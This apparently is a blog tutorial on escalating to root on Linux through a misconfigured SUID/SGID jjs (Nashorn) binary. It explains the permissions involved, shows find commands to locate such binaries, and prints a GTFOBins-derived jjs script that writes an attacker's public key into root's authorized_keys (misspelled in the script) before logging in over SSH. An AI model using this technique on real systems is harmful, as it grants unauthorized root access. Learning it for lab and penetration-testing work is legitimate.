PRIVILEGE ESCALATION (LINUX) – JJS

Description: JJS is an acronym for ‘java java script’. JJS is a command-line tool to invoke the ‘Nashorn’ engine. This is the recommended tool, created specifically for ‘Nashorn’. To evaluate a script file using Nashorn, pass the name of the script file to the jjs tool.

What is Nashorn engine ?

Nashorn is the high-performance JavaScript engine developed in Java. It allows the developer to execute JavaScript in Java and vice versa. After Java SE 7, Nashorn has become the official JavaScript engine and all JDKs are shipped with it. Nashorn supports and implements the ECMAScript 5.1 specification.

  • Nashorn helps the developer to add scripting support to the application. The end-user can quickly modify the product without recompiling the whole Java application.
  • Developers can leverage Nashorn to JavaScript code on the server without rewriting the business logic. E.g. the code for input validation on the client-side can be reused on the server-side because the business logic remains the same.

How is it possible?

It is possible to elevate privileges, if SUID or SGID permissions are enabled. Basically it’s a misconfigured permission , which leads to privilege escalation.

What is SUID ?

SUID (Set owner User ID up on execution) is a special type of file permissions given to a file. Normally in Linux/Unix when a program runs, it inherit’s access permissions from the logged in user. SUID is defined as giving temporary permissions to a user to run a program/file with the permissions of the file owner rather that the user who runs it. In simple words users will get file owner’s permissions as well as owner UID and GID when executing a file/program/command.

What is SGID ?

SGID (Set Group ID up on execution) is a special type of file permissions given to a file/folder. Normally in Linux/Unix when a program runs, it inherits access permissions from the logged in user. SGID is defined as giving temporary permissions to a user to run a program/file with the permissions of the file group permissions to become member of that group to execute the file. In simple words users will get file Group’s permissions when executing a Folder/file/program/command.

SGID is similar to SUID. The difference between both is that SUID assumes owner of the file permissions and SGID assumes group’s permissions when executing a file instead of logged in user inherit permissions.

How to identify ?

Run automated script like LinEnum.sh, linpeas.sh etc. or ” $find / -perm +4000 “ or “$find / -perm +2000”

Time to exploit!!!

I found a very effective and great script written by “gtfobins”, link given below.

https://gtfobins.github.io/gtfobins/jjs/

Basically we are elevating the privileges with “gtfobins” script and writing into ‘/root/.ssh’ folder.

echo 'var FileWriter = Java.type("java.io.FileWriter");
var fw=new FileWriter("/root/.ssh/authrized_keys");
fw.write("<public key>");
fw.close();' | jjs

copy paste above code and create “test.sh” file.

Execute “test.sh” in target machine.

Login with your private key.

  • Syntax: ssh -i <private key> username@host-ip
  • Example: ssh -i id_rsa root@10.10.10.162

We have successfully exploited the misconfigured ‘jjs’ tool.

References

Create your website with WordPress.com
Get started
%d bloggers like this: